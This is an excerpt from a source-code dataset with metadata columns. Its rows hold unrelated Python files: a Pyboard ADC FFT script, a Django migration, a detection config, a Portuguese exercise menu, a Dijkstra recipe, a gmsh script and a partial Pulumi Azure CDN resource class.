hexsha
stringlengths 40
40
| size
int64 1
1.03M
| ext
stringclasses 10
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 3
239
| max_stars_repo_name
stringlengths 5
130
| max_stars_repo_head_hexsha
stringlengths 40
78
| max_stars_repo_licenses
sequencelengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 3
239
| max_issues_repo_name
stringlengths 5
130
| max_issues_repo_head_hexsha
stringlengths 40
78
| max_issues_repo_licenses
sequencelengths 1
10
| max_issues_count
int64 1
67k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 3
239
| max_forks_repo_name
stringlengths 5
130
| max_forks_repo_head_hexsha
stringlengths 40
78
| max_forks_repo_licenses
sequencelengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 1
1.03M
| avg_line_length
float64 1
958k
| max_line_length
int64 1
1.03M
| alphanum_fraction
float64 0
1
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
4a27c6d7f9f3fe0e2a780d6baa10c63fc2939f15 | 1,191 | py | Python | tests/pyboard/execScript_adc_son_fft.py | david-therincourt/physique | add85faef564359252da93dca9b7dbb35bd6b4ab | [
"MIT"
] | null | null | null | tests/pyboard/execScript_adc_son_fft.py | david-therincourt/physique | add85faef564359252da93dca9b7dbb35bd6b4ab | [
"MIT"
] | null | null | null | tests/pyboard/execScript_adc_son_fft.py | david-therincourt/physique | add85faef564359252da93dca9b7dbb35bd6b4ab | [
"MIT"
] | null | null | null | from physique import Pyboard
import numpy as np
import matplotlib.pyplot as plt
from numpy.fft import fft
script = """
from pyb import Pin, ADC, Timer, delay
import array
f = 20000 # fréquence d'échantillonnage
nb = 1000 # nombre de points
adc = ADC(Pin('A2')) # Activation du CAN sur la broche A0
buf = array.array("h", [0]*nb) # h = signed short (entier sur 2 octets)
tim = Timer(6, freq=f) # Paramétrage du timer du CAN
adc.read_timed(buf, tim) # Lancement des mesures
# Mise en forme des données
f = tim.freq()
x = [i*1/f for i in range(nb)]
y = [val for val in buf]
# transmission des données
data = x, y # Tuple de données
print(data) # Affichage du tuple dans le REPL
"""
feather = Pyboard("/dev/ttyACM0")
x, y = feather.exec_script_to_data(script)
t = np.array(x)
u = np.array(y)
rate = 20000
plt.subplot(2,1,1)
plt.plot(t,u,'r')
plt.grid()
#plt.ylim(0,4000)
plt.subplot(2,1,2)
spectre = np.absolute(fft(y))
#spectre = spectre/spectre.max()
n = spectre.size
freq = np.arange(n)*1.0/n*rate
plt.vlines(freq[1:-1],[0],spectre[1:-1],'r')
plt.xlabel('f (Hz)')
plt.ylabel('A')
#plt.axis([0,0.5*rate,0,1])
plt.show()
| 22.903846 | 83 | 0.646516 |
4a27c712c4ba96ad083cf65f36aa1d94cc93aac7 | 276 | py | Python | authors/apps/articles/migrations/0024_merge_20190130_0649.py | andela/ah-django-unchained | a4e5f6cd11fdc0b9422020693ac1200b849cf0f3 | [
"BSD-3-Clause"
] | null | null | null | authors/apps/articles/migrations/0024_merge_20190130_0649.py | andela/ah-django-unchained | a4e5f6cd11fdc0b9422020693ac1200b849cf0f3 | [
"BSD-3-Clause"
] | 26 | 2019-01-07T14:22:05.000Z | 2019-02-28T17:11:48.000Z | authors/apps/articles/migrations/0024_merge_20190130_0649.py | andela/ah-django-unchained | a4e5f6cd11fdc0b9422020693ac1200b849cf0f3 | [
"BSD-3-Clause"
] | 3 | 2019-09-19T22:16:09.000Z | 2019-10-16T21:16:16.000Z | # Generated by Django 2.1.5 on 2019-01-30 06:49
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('articles', '0023_merge_20190129_0617'),
('articles', '0023_auto_20190129_1219'),
]
operations = [
]
| 18.4 | 49 | 0.652174 |
4a27c81c1440b9420ebda80dd5cd4b348f790715 | 1,728 | py | Python | configs/_base_/datasets/icdar2019_tracka_modern_instance.py | vansin/tabnet | 2403c8134c23a704940522ace92a75b0fc6f5d99 | [
"Apache-2.0"
] | 2 | 2021-10-18T02:52:18.000Z | 2022-01-21T08:54:18.000Z | configs/_base_/datasets/icdar2019_tracka_modern_instance.py | vansin/tabnet | 2403c8134c23a704940522ace92a75b0fc6f5d99 | [
"Apache-2.0"
] | null | null | null | configs/_base_/datasets/icdar2019_tracka_modern_instance.py | vansin/tabnet | 2403c8134c23a704940522ace92a75b0fc6f5d99 | [
"Apache-2.0"
] | null | null | null | # dataset settings
dataset_type = 'TableDataset'
data_root = 'data/table/'
img_norm_cfg = dict(
mean=[123.675, 116.28, 103.53], std=[58.395, 57.12, 57.375], to_rgb=True)
train_pipeline = [
dict(type='LoadImageFromFile'),
dict(type='LoadAnnotations', with_bbox=True, with_mask=True),
dict(type='Resize', img_scale=(1333, 800), keep_ratio=True),
dict(type='RandomFlip', flip_ratio=0.5),
dict(type='Normalize', **img_norm_cfg),
dict(type='Pad', size_divisor=32),
dict(type='DefaultFormatBundle'),
dict(type='Collect', keys=['img', 'gt_bboxes', 'gt_labels', 'gt_masks']),
]
test_pipeline = [
dict(type='LoadImageFromFile'),
dict(
type='MultiScaleFlipAug',
img_scale=(1333, 800),
flip=False,
transforms=[
dict(type='Resize', keep_ratio=True),
dict(type='RandomFlip'),
dict(type='Normalize', **img_norm_cfg),
dict(type='Pad', size_divisor=32),
dict(type='ImageToTensor', keys=['img']),
dict(type='Collect', keys=['img']),
])
]
data = dict(
samples_per_gpu=2,
workers_per_gpu=2,
train=dict(
type=dataset_type,
ann_file='data/icdar2019/modern_train.json',
img_prefix='data/icdar2019/training/TRACKA/ground_truth',
pipeline=train_pipeline),
val=dict(
type=dataset_type,
ann_file='data/icdar2019/modern_test.json',
img_prefix='data/icdar2019/test/TRACKA/',
pipeline=test_pipeline),
test=dict(
type=dataset_type,
ann_file='data/icdar2019/modern_test.json',
img_prefix='data/icdar2019/test/TRACKA/',
pipeline=test_pipeline))
evaluation = dict(metric=['bbox', 'segm'])
| 34.56 | 77 | 0.629051 |
4a27c8285f91dbb3a65facbb430585dda6274885 | 5,751 | py | Python | Scripts/python/scripts mundo 1/Desafios/ALGUEM ME MATA.py | BrenoNAlmeida/Scripts-Escola | 20d886d0401ef7f40a4a46e307eadbf5b1c0a5eb | [
"Apache-2.0"
] | null | null | null | Scripts/python/scripts mundo 1/Desafios/ALGUEM ME MATA.py | BrenoNAlmeida/Scripts-Escola | 20d886d0401ef7f40a4a46e307eadbf5b1c0a5eb | [
"Apache-2.0"
] | null | null | null | Scripts/python/scripts mundo 1/Desafios/ALGUEM ME MATA.py | BrenoNAlmeida/Scripts-Escola | 20d886d0401ef7f40a4a46e307eadbf5b1c0a5eb | [
"Apache-2.0"
] | null | null | null | nome = input('\033[34;1mOla, você esta na biblioteca python. Qual o seu nome ?\033[m')
print('\033[1;34mBem vindo ao primeiro mundo do curso de python {} !\033[m'.format(nome))
print('\033[34;1mAs fases desse curso são essas {}:\033[m\n'
'\033[1;33m1 = Seja um programador\n'
'2 = Para que serve o Python\n'
'3 = instalando o python3 e o IDLE\n'
'4 = primeiros comandos em python\n'
'5 = instalando o Pycharm e o Qpython\n'
'6 = Tipos primitivos e saida de dados\n'
'7 = Operadores Aritmeticos\n'
'8 = Utilizando modulos\n'
'9 = Manipulando texto\n'
'10 = Condições\033[m'.format(nome))
print('\033[35m=='*25)
print('\033[1;31m(obs : digite apenas o numero da fase desejada !!!)\033[m')
escolha=input('\033[34mDe que fase você deseja acessar os desafios {} ? \033[m'.format(nome))
print('\033[35m==\033[m'*26)
if escolha == '1':
print('\033[31;1mEssa fase NÃO tem nenhum desafio senhor {} !'.format(nome))
if escolha == '2':
print('\033[31;1mEssa fase NÃO tem nenhum desafio senhor {} !'.format(nome))
if escolha == '3':
print('\033[31;1mEssa fase NÃO tem nenhum desafio senhor {} !\033[m'.format(nome))
if escolha == '4':
print('\033[33;1mOs desafios dessa fase são esses {} :'
'\n 01 = Deixando tudo pronto'
'\n 02 = Respondendo ao usuario\033[m'.format(nome))
if escolha == '5':
print('\033[31;1mEssa fase NÃO tem nenhum desafio senhor {} !\033[m'.format(nome))
if escolha == '6':
print('\033[34mOs desafios dessa fase sao esses {} :'
'\n\033[33m 03 = Somando dois numeros'
'\n 04 = Analisando uma variavel\033[m'.format(nome))
if escolha == '7':
print('\033[34;1mOs desafios dessa fase são esses {} :'
'\n\033[33;1m 05 = Antecessor e sucessor de um numero'
'\n 06 = Dobro , triplo e Raiz quadrada de um numero'
'\n 07 = Media aritmetica'
'\n 08 = Conversor de medidas'
'\n 09 = Tabuada de um numero'
'\n 10 = Conversor de moedas'
'\n 11 = Pintando uma parede'
'\n 12 = Calculando desconto em 5%'
'\n 13 = Reajuste salarial'
'\n 14 = Conversor de temperaturas'
'\n 15 = Aluguel de carros\033[m'.format(nome))
if escolha == '8':
print('\033[1;34mOs desafios dessa fase são esses {} : !'
'\n\033[33;1m 16 = Quebrando um numero'
'\n 17 = calculando a hipotenuza'
'\n 18 = Seno ,cossene tangente'
'\n 19 = Sorteando um item da lista'
'\n 20 = Sorteando uma ordem na lista'
'\n 21 = Tocando um Mp3\033[m'.format(nome))
if escolha == '9':
print('\033[1;34mOs desafios dessa fase são esses {} : !'
'\n\033[33;1m 22 = Analizador de texto'
'\n 23 = Separando digitos de um numero'
'\n 24 = verificando as primeiras letras'
'\n 25 = procurando uma string dentro de uma variavel'
'\n 26 = primeira ocorrencia de uma string'
'\n 27 = primeiro e ultimo nome de uma pessoa\033[m'.format(nome))
if escolha == '10':
print('\033[1;34mOs desafios dessa fase são esses {} : !'
'\n 28 = jogo do adivinha'
'\n 29 = Radar eletronico'
'\n 30 = Par ou impar'
'\n 31 = custo da viagem'
'\n 32 = Ano bissexto'
'\n 33 = Maior e menor valor'
'\n 34 = Almento de salario'
'\n 35 = Analizando triangulo')
print('\033[35m=='*19)
so_arrumo_trabalho = input('\033[34mQual desafio você deseja executar {} ?\033[m'.format(nome))
print('\033[1;35m==\033[m'*19)
print('\033[34mO arquivo seráa executado em seguida !\033[m')
print('\033[1;35m==\033[m'*19)
if so_arrumo_trabalho == '01':
import Desafio001
if so_arrumo_trabalho == '02':
import Desafio002
if so_arrumo_trabalho == '03':
import Desafio003
if so_arrumo_trabalho == '04':
import Desafio004
if so_arrumo_trabalho == '05':
import Desafio005
if so_arrumo_trabalho == '06':
import Desafio006
if so_arrumo_trabalho == '07':
import Desafio007
if so_arrumo_trabalho == '08':
import Desafio008
if so_arrumo_trabalho == '09':
import Desafio009
if so_arrumo_trabalho == '10':
import Desafio010
if so_arrumo_trabalho == '11':
import Desafio011
if so_arrumo_trabalho == '12':
import Desafio013
if so_arrumo_trabalho == '13':
import Desafio013
if so_arrumo_trabalho == '14':
import Desafio014
if so_arrumo_trabalho == '15':
import Desafio015
if so_arrumo_trabalho == '16':
import Desafio016
if so_arrumo_trabalho == '17':
import Desafio017
if so_arrumo_trabalho == '18':
import Desafio018
if so_arrumo_trabalho == '19':
import Desafio019
if so_arrumo_trabalho == '20':
import Desafio020
if so_arrumo_trabalho == '21':
import Desafio021
if so_arrumo_trabalho == '22':
import Desafio022
if so_arrumo_trabalho == '23':
import Desafio023
if so_arrumo_trabalho == '24':
import Desafio024
if so_arrumo_trabalho == '25':
import Desafio025
if so_arrumo_trabalho == '26':
import Desafio027
if so_arrumo_trabalho == '27':
import Desafio027
if so_arrumo_trabalho == '28':
import Desafio028
if so_arrumo_trabalho == '29':
import Desafio029
if so_arrumo_trabalho == '30':
import Desafio030
if so_arrumo_trabalho == '31':
import Desafio031
if so_arrumo_trabalho == '32':
import Desafio032
if so_arrumo_trabalho == '33':
import Desafio033
if so_arrumo_trabalho == '34':
import Desafio034
if so_arrumo_trabalho == '35':
import Desafio035
print('===== fim da executação =====')
print('Obrigado por usar nossa bibliotaca {}'.format(nome))
print('espero que tenha gostado dos nossos serviços !') | 38.34 | 95 | 0.630499 |
4a27c82f8b117750422de2ef83f18859fbc93328 | 1,126 | py | Python | cdtools/CPA/__init__.py | jg-you/cascading_detection | a08f443f5f7bf46167277b2cb0571f5d94a341c6 | [
"MIT"
] | 4 | 2015-09-28T05:09:15.000Z | 2019-10-25T15:16:16.000Z | cdtools/CPA/__init__.py | jg-you/cascading_detection | a08f443f5f7bf46167277b2cb0571f5d94a341c6 | [
"MIT"
] | null | null | null | cdtools/CPA/__init__.py | jg-you/cascading_detection | a08f443f5f7bf46167277b2cb0571f5d94a341c6 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# cdtools -- a python library for cascading community detection on networks
# @author: Jean-Gabriel Young <[email protected]>
#
# cdtools/CPA/__init__.py -- Init script of the CPA submodule.
# Notes on CPA:
# The Clique Percolation Algorithm was introduced by G. Palla et al. in
#
# "Uncovering the overlapping community structure
# of complex networks in nature and society"
# Nature 435, 814–818 (2005)
#
# We use the official CPA implementation which requires a (free)
# license, which is *not* provided with cdtools, for obvious reasons.
# To use this module, one must request a license [1] and save it in
#
# [..]/cascading_detection/cdtools/CPA/license/
#
# Do not forget to configure the license in
#
# [..]/cascading_detection/cdtools/CPA/CPA_conf.yml
#
# Bugs and other inquiries regarding this algorithm in particular should be
# sent to the authors of CFinder as well.
#
# [1] Contact information:
# Email: [email protected]
# Website: http://CFinder.org
from .detection import Detect
__all__ = [Detect]
| 33.117647 | 77 | 0.694494 |
4a27c9677bae0d915ff7f933fcdd1d84eab7b008 | 2,951 | py | Python | recipes/Python/119466_Dijkstralgorithm_shortest/recipe-119466.py | tdiprima/code | 61a74f5f93da087d27c70b2efe779ac6bd2a3b4f | [
"MIT"
] | 2,023 | 2017-07-29T09:34:46.000Z | 2022-03-24T08:00:45.000Z | recipes/Python/119466_Dijkstralgorithm_shortest/recipe-119466.py | unhacker/code | 73b09edc1b9850c557a79296655f140ce5e853db | [
"MIT"
] | 32 | 2017-09-02T17:20:08.000Z | 2022-02-11T17:49:37.000Z | recipes/Python/119466_Dijkstralgorithm_shortest/recipe-119466.py | unhacker/code | 73b09edc1b9850c557a79296655f140ce5e853db | [
"MIT"
] | 780 | 2017-07-28T19:23:28.000Z | 2022-03-25T20:39:41.000Z | # Dijkstra's algorithm for shortest paths
# David Eppstein, UC Irvine, 4 April 2002
# http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/117228
from priodict import priorityDictionary
def Dijkstra(G,start,end=None):
"""
Find shortest paths from the start vertex to all
vertices nearer than or equal to the end.
The input graph G is assumed to have the following
representation: A vertex can be any object that can
be used as an index into a dictionary. G is a
dictionary, indexed by vertices. For any vertex v,
G[v] is itself a dictionary, indexed by the neighbors
of v. For any edge v->w, G[v][w] is the length of
the edge. This is related to the representation in
<http://www.python.org/doc/essays/graphs.html>
where Guido van Rossum suggests representing graphs
as dictionaries mapping vertices to lists of neighbors,
however dictionaries of edges have many advantages
over lists: they can store extra information (here,
the lengths), they support fast existence tests,
and they allow easy modification of the graph by edge
insertion and removal. Such modifications are not
needed here but are important in other graph algorithms.
Since dictionaries obey iterator protocol, a graph
represented as described here could be handed without
modification to an algorithm using Guido's representation.
Of course, G and G[v] need not be Python dict objects;
they can be any other object that obeys dict protocol,
for instance a wrapper in which vertices are URLs
and a call to G[v] loads the web page and finds its links.
The output is a pair (D,P) where D[v] is the distance
from start to v and P[v] is the predecessor of v along
the shortest path from s to v.
Dijkstra's algorithm is only guaranteed to work correctly
when all edge lengths are positive. This code does not
verify this property for all edges (only the edges seen
before the end vertex is reached), but will correctly
compute shortest paths even for some graphs with negative
edges, and will raise an exception if it discovers that
a negative edge has caused it to make a mistake.
"""
D = {} # dictionary of final distances
P = {} # dictionary of predecessors
Q = priorityDictionary() # est.dist. of non-final vert.
Q[start] = 0
for v in Q:
D[v] = Q[v]
if v == end: break
for w in G[v]:
vwLength = D[v] + G[v][w]
if w in D:
if vwLength < D[w]:
raise ValueError, \
"Dijkstra: found better path to already-final vertex"
elif w not in Q or vwLength < Q[w]:
Q[w] = vwLength
P[w] = v
return (D,P)
def shortestPath(G,start,end):
"""
Find a single shortest path from the given start vertex
to the given end vertex.
The input has the same conventions as Dijkstra().
The output is a list of the vertices in order along
the shortest path.
"""
D,P = Dijkstra(G,start,end)
Path = []
while 1:
Path.append(end)
if end == start: break
end = P[end]
Path.reverse()
return Path
| 33.534091 | 64 | 0.731278 |
4a27c99294943e26cc151bf61fc257cbb1f616a5 | 863 | py | Python | onelab/share/doc/gmsh/demos/api/step_assembly.py | Christophe-Foyer/PyFEA | 344996d6b075ee4b2214283f0af8159d86d154fd | [
"MIT"
] | 2 | 2021-08-13T21:46:21.000Z | 2022-01-15T15:59:54.000Z | onelab/share/doc/gmsh/demos/api/step_assembly.py | Christophe-Foyer/pyFEA | 344996d6b075ee4b2214283f0af8159d86d154fd | [
"MIT"
] | null | null | null | onelab/share/doc/gmsh/demos/api/step_assembly.py | Christophe-Foyer/pyFEA | 344996d6b075ee4b2214283f0af8159d86d154fd | [
"MIT"
] | 1 | 2020-12-15T13:47:23.000Z | 2020-12-15T13:47:23.000Z | import gmsh
gmsh.initialize()
# load step file
gmsh.open('as1-tu-203.stp')
# get all model entities
ent = gmsh.model.getEntities()
physicals = {}
for e in ent:
n = gmsh.model.getEntityName(e[0], e[1])
# get entity labels read from STEP and create a physical group for all
# entities having the same 3rd label in the /-separated label path
if n:
print('Entity ' + str(e) + ' has label ' + n + ' (and mass ' +
str(gmsh.model.occ.getMass(e[0], e[1])) + ')')
path = n.split('/')
if e[0] == 3 and len(path) > 3:
if(path[2] not in physicals):
physicals[path[2]] = []
physicals[path[2]].append(e[1])
# create the physical groups
for name, tags in physicals.items():
p = gmsh.model.addPhysicalGroup(3, tags)
gmsh.model.setPhysicalName(3, p, name)
gmsh.fltk.run()
| 27.83871 | 74 | 0.596756 |
4a27c9b8b66eea7bd199ce3ffb1963eb2f53926b | 18,882 | py | Python | sdk/python/pulumi_azure_native/cdn/v20190615/endpoint.py | pulumi-bot/pulumi-azure-native | f7b9490b5211544318e455e5cceafe47b628e12c | [
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_azure_native/cdn/v20190615/endpoint.py | pulumi-bot/pulumi-azure-native | f7b9490b5211544318e455e5cceafe47b628e12c | [
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_azure_native/cdn/v20190615/endpoint.py | pulumi-bot/pulumi-azure-native | f7b9490b5211544318e455e5cceafe47b628e12c | [
"Apache-2.0"
] | null | null | null | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from ... import _utilities, _tables
from . import outputs
from ._enums import *
from ._inputs import *
__all__ = ['Endpoint']
class Endpoint(pulumi.CustomResource):
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
content_types_to_compress: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
delivery_policy: Optional[pulumi.Input[pulumi.InputType['EndpointPropertiesUpdateParametersDeliveryPolicyArgs']]] = None,
endpoint_name: Optional[pulumi.Input[str]] = None,
geo_filters: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['GeoFilterArgs']]]]] = None,
is_compression_enabled: Optional[pulumi.Input[bool]] = None,
is_http_allowed: Optional[pulumi.Input[bool]] = None,
is_https_allowed: Optional[pulumi.Input[bool]] = None,
location: Optional[pulumi.Input[str]] = None,
optimization_type: Optional[pulumi.Input[Union[str, 'OptimizationType']]] = None,
origin_host_header: Optional[pulumi.Input[str]] = None,
origin_path: Optional[pulumi.Input[str]] = None,
origins: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['DeepCreatedOriginArgs']]]]] = None,
probe_path: Optional[pulumi.Input[str]] = None,
profile_name: Optional[pulumi.Input[str]] = None,
query_string_caching_behavior: Optional[pulumi.Input['QueryStringCachingBehavior']] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
web_application_firewall_policy_link: Optional[pulumi.Input[pulumi.InputType['EndpointPropertiesUpdateParametersWebApplicationFirewallPolicyLinkArgs']]] = None,
__props__=None,
__name__=None,
__opts__=None):
"""
CDN endpoint is the entity within a CDN profile containing configuration information such as origin, protocol, content caching and delivery behavior. The CDN endpoint uses the URL format <endpointname>.azureedge.net.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[Sequence[pulumi.Input[str]]] content_types_to_compress: List of content types on which compression applies. The value should be a valid MIME type.
:param pulumi.Input[pulumi.InputType['EndpointPropertiesUpdateParametersDeliveryPolicyArgs']] delivery_policy: A policy that specifies the delivery rules to be used for an endpoint.
:param pulumi.Input[str] endpoint_name: Name of the endpoint under the profile which is unique globally.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['GeoFilterArgs']]]] geo_filters: List of rules defining the user's geo access within a CDN endpoint. Each geo filter defines an access rule to a specified path or content, e.g. block APAC for path /pictures/
:param pulumi.Input[bool] is_compression_enabled: Indicates whether content compression is enabled on CDN. Default value is false. If compression is enabled, content will be served as compressed if user requests for a compressed version. Content won't be compressed on CDN when requested content is smaller than 1 byte or larger than 1 MB.
:param pulumi.Input[bool] is_http_allowed: Indicates whether HTTP traffic is allowed on the endpoint. Default value is true. At least one protocol (HTTP or HTTPS) must be allowed.
:param pulumi.Input[bool] is_https_allowed: Indicates whether HTTPS traffic is allowed on the endpoint. Default value is true. At least one protocol (HTTP or HTTPS) must be allowed.
:param pulumi.Input[str] location: Resource location.
:param pulumi.Input[Union[str, 'OptimizationType']] optimization_type: Specifies what scenario the customer wants this CDN endpoint to optimize for, e.g. Download, Media services. With this information, CDN can apply scenario driven optimization.
:param pulumi.Input[str] origin_host_header: The host header value sent to the origin with each request. If you leave this blank, the request hostname determines this value. Azure CDN origins, such as Web Apps, Blob Storage, and Cloud Services require this host header value to match the origin hostname by default.
:param pulumi.Input[str] origin_path: A directory path on the origin that CDN can use to retrieve content from, e.g. contoso.cloudapp.net/originpath.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['DeepCreatedOriginArgs']]]] origins: The source of the content being delivered via CDN.
:param pulumi.Input[str] probe_path: Path to a file hosted on the origin which helps accelerate delivery of the dynamic content and calculate the most optimal routes for the CDN. This is relative to the origin path.
:param pulumi.Input[str] profile_name: Name of the CDN profile which is unique within the resource group.
:param pulumi.Input['QueryStringCachingBehavior'] query_string_caching_behavior: Defines how CDN caches requests that include query strings. You can ignore any query strings when caching, bypass caching to prevent requests that contain query strings from being cached, or cache every request with a unique URL.
:param pulumi.Input[str] resource_group_name: Name of the Resource group within the Azure subscription.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Resource tags.
:param pulumi.Input[pulumi.InputType['EndpointPropertiesUpdateParametersWebApplicationFirewallPolicyLinkArgs']] web_application_firewall_policy_link: Defines the Web Application Firewall policy for the endpoint (if applicable)
"""
if __name__ is not None:
warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning)
resource_name = __name__
if __opts__ is not None:
warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning)
opts = __opts__
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = dict()
__props__['content_types_to_compress'] = content_types_to_compress
__props__['delivery_policy'] = delivery_policy
__props__['endpoint_name'] = endpoint_name
__props__['geo_filters'] = geo_filters
__props__['is_compression_enabled'] = is_compression_enabled
__props__['is_http_allowed'] = is_http_allowed
__props__['is_https_allowed'] = is_https_allowed
__props__['location'] = location
__props__['optimization_type'] = optimization_type
__props__['origin_host_header'] = origin_host_header
__props__['origin_path'] = origin_path
if origins is None and not opts.urn:
raise TypeError("Missing required property 'origins'")
__props__['origins'] = origins
__props__['probe_path'] = probe_path
if profile_name is None and not opts.urn:
raise TypeError("Missing required property 'profile_name'")
__props__['profile_name'] = profile_name
__props__['query_string_caching_behavior'] = query_string_caching_behavior
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__['resource_group_name'] = resource_group_name
__props__['tags'] = tags
__props__['web_application_firewall_policy_link'] = web_application_firewall_policy_link
__props__['host_name'] = None
__props__['name'] = None
__props__['provisioning_state'] = None
__props__['resource_state'] = None
__props__['type'] = None
alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:cdn/v20190615:Endpoint"), pulumi.Alias(type_="azure-native:cdn:Endpoint"), pulumi.Alias(type_="azure-nextgen:cdn:Endpoint"), pulumi.Alias(type_="azure-native:cdn/latest:Endpoint"), pulumi.Alias(type_="azure-nextgen:cdn/latest:Endpoint"), pulumi.Alias(type_="azure-native:cdn/v20150601:Endpoint"), pulumi.Alias(type_="azure-nextgen:cdn/v20150601:Endpoint"), pulumi.Alias(type_="azure-native:cdn/v20160402:Endpoint"), pulumi.Alias(type_="azure-nextgen:cdn/v20160402:Endpoint"), pulumi.Alias(type_="azure-native:cdn/v20161002:Endpoint"), pulumi.Alias(type_="azure-nextgen:cdn/v20161002:Endpoint"), pulumi.Alias(type_="azure-native:cdn/v20170402:Endpoint"), pulumi.Alias(type_="azure-nextgen:cdn/v20170402:Endpoint"), pulumi.Alias(type_="azure-native:cdn/v20171012:Endpoint"), pulumi.Alias(type_="azure-nextgen:cdn/v20171012:Endpoint"), pulumi.Alias(type_="azure-native:cdn/v20190415:Endpoint"), pulumi.Alias(type_="azure-nextgen:cdn/v20190415:Endpoint"), pulumi.Alias(type_="azure-native:cdn/v20190615preview:Endpoint"), pulumi.Alias(type_="azure-nextgen:cdn/v20190615preview:Endpoint"), pulumi.Alias(type_="azure-native:cdn/v20191231:Endpoint"), pulumi.Alias(type_="azure-nextgen:cdn/v20191231:Endpoint"), pulumi.Alias(type_="azure-native:cdn/v20200331:Endpoint"), pulumi.Alias(type_="azure-nextgen:cdn/v20200331:Endpoint"), pulumi.Alias(type_="azure-native:cdn/v20200415:Endpoint"), pulumi.Alias(type_="azure-nextgen:cdn/v20200415:Endpoint"), pulumi.Alias(type_="azure-native:cdn/v20200901:Endpoint"), pulumi.Alias(type_="azure-nextgen:cdn/v20200901:Endpoint")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(Endpoint, __self__).__init__(
'azure-native:cdn/v20190615:Endpoint',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'Endpoint':
"""
Get an existing Endpoint resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = dict()
__props__["content_types_to_compress"] = None
__props__["delivery_policy"] = None
__props__["geo_filters"] = None
__props__["host_name"] = None
__props__["is_compression_enabled"] = None
__props__["is_http_allowed"] = None
__props__["is_https_allowed"] = None
__props__["location"] = None
__props__["name"] = None
__props__["optimization_type"] = None
__props__["origin_host_header"] = None
__props__["origin_path"] = None
__props__["origins"] = None
__props__["probe_path"] = None
__props__["provisioning_state"] = None
__props__["query_string_caching_behavior"] = None
__props__["resource_state"] = None
__props__["tags"] = None
__props__["type"] = None
__props__["web_application_firewall_policy_link"] = None
return Endpoint(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="contentTypesToCompress")
def content_types_to_compress(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
List of content types on which compression applies. The value should be a valid MIME type.
"""
return pulumi.get(self, "content_types_to_compress")
@property
@pulumi.getter(name="deliveryPolicy")
def delivery_policy(self) -> pulumi.Output[Optional['outputs.EndpointPropertiesUpdateParametersResponseDeliveryPolicy']]:
"""
A policy that specifies the delivery rules to be used for an endpoint.
"""
return pulumi.get(self, "delivery_policy")
@property
@pulumi.getter(name="geoFilters")
def geo_filters(self) -> pulumi.Output[Optional[Sequence['outputs.GeoFilterResponse']]]:
"""
List of rules defining the user's geo access within a CDN endpoint. Each geo filter defines an access rule to a specified path or content, e.g. block APAC for path /pictures/
"""
return pulumi.get(self, "geo_filters")
@property
@pulumi.getter(name="hostName")
def host_name(self) -> pulumi.Output[str]:
"""
The host name of the endpoint structured as {endpointName}.{DNSZone}, e.g. contoso.azureedge.net
"""
return pulumi.get(self, "host_name")
@property
@pulumi.getter(name="isCompressionEnabled")
def is_compression_enabled(self) -> pulumi.Output[Optional[bool]]:
"""
Indicates whether content compression is enabled on CDN. Default value is false. If compression is enabled, content will be served as compressed if user requests for a compressed version. Content won't be compressed on CDN when requested content is smaller than 1 byte or larger than 1 MB.
"""
return pulumi.get(self, "is_compression_enabled")
@property
@pulumi.getter(name="isHttpAllowed")
def is_http_allowed(self) -> pulumi.Output[Optional[bool]]:
"""
Indicates whether HTTP traffic is allowed on the endpoint. Default value is true. At least one protocol (HTTP or HTTPS) must be allowed.
"""
return pulumi.get(self, "is_http_allowed")
@property
@pulumi.getter(name="isHttpsAllowed")
